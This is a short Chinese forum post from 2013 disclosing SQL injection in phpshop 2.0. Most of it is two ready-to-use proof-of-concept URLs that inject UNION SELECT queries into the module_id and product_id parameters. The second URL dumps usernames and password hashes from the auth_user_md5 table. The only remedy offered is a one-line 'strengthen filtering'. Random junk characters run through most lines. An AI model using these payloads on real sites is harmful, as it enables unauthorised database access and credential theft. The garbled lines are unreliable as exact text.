找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1990|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability9 @8 ?# c  H2 E, k3 J0 }
9 \# ^) R, T% I
作者 : By onestree8 [5 `" b: g& o5 l: H) m' o$ q" N
下载地址 : http://code.google.com/p/phpshop/downloads/list8 E- a8 K) \; y% e/ y* h( u, E
测试地址: windows 7 / ubuntu1 Q6 K9 v, x' a0 H2 r
- d2 F7 l* i$ K' P8 {& n. j+ y6 N5 P
# y/ h" t2 y: a  C+ R
SQLi p0c:
* \7 r3 i/ @/ q) ?1 X* g. N
% n4 U; K  H6 w. @: K==================
1 C) n; m* M7 }5 g# k0 | 3 E0 o) ^' V6 V7 N3 @2 `
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
, ~. f0 o! o; e" `* h7 D2 uunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
% J4 k2 W* e; q# U  C 6 V& T: }$ c# Z/ g$ b
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--: M. |* g3 ~. K, _7 r4 q; N- I

/ ^2 [3 N8 C& W0 ^& k: x. j修复:
( ~4 D3 ~5 P& C& z加强过滤
# t. z' I  _" W. y) S! V
2 N. k$ }- z- W5 G4 n3 S5 n$ d9 A8 w& d& _
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表